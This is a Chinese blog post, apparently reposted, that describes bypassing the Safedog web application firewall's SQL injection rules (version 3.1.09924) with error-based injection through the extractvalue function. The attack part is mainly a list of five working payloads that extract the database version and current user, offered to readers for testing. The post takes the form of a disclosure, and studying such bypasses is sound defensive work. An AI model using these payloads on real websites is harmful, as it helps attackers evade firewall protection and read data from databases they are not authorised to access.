Bypass网站安全狗最新防护规则(SQL报错注射技巧)之二

暗月博客 2019年11月21日21:26:45评论419 views字数 443阅读1分28秒阅读模式
摘要

放暑假:)

绕过最新网站安全狗sql注入 防护规则#2
利用的是updatexml函数,然而这次用extractvalue函数进行报错注入 的话也同样可以绕过:) 漏洞 证明: 测试环境:

windows server2003 & 最新网站安全狗(APACHE)3.1.09924 网马库更新时间2015-06-05

同样随便找一个可报注入的程序~

简要描述:

放暑假:)

绕过最新网站安全狗sql注入防护规则#2

详细说明:

利用的是updatexml函数,然而这次用extractvalue函数进行报错注入的话也同样可以绕过:)

漏洞证明:

测试环境:

windows server2003 & 最新网站安全狗(APACHE)3.1.09924 网马库更新时间2015-06-05

同样随便找一个可报注入的程序~

Bypass网站安全狗最新防护规则(SQL报错注射技巧)之二

防护日志:

Bypass网站安全狗最新防护规则(SQL报错注射技巧)之二

发几个供你们测试的payload:

code 区域

extractvalue(rand(0),concat(0x0a,version()))  extractvalue(floor(0),concat(0x0a,version()))  extractvalue(rand(0),concat(0x0a,unhex(hex(user()))))  extractvalue(floor(0),concat(0x0a,unhex(hex(user()))))  extractvalue(rand(0),convert(user() using latin1))

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日21:26:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Bypass网站安全狗最新防护规则(SQL报错注射技巧)之二http://cn-sec.com/archives/72373.html

发表评论

匿名网友 填写信息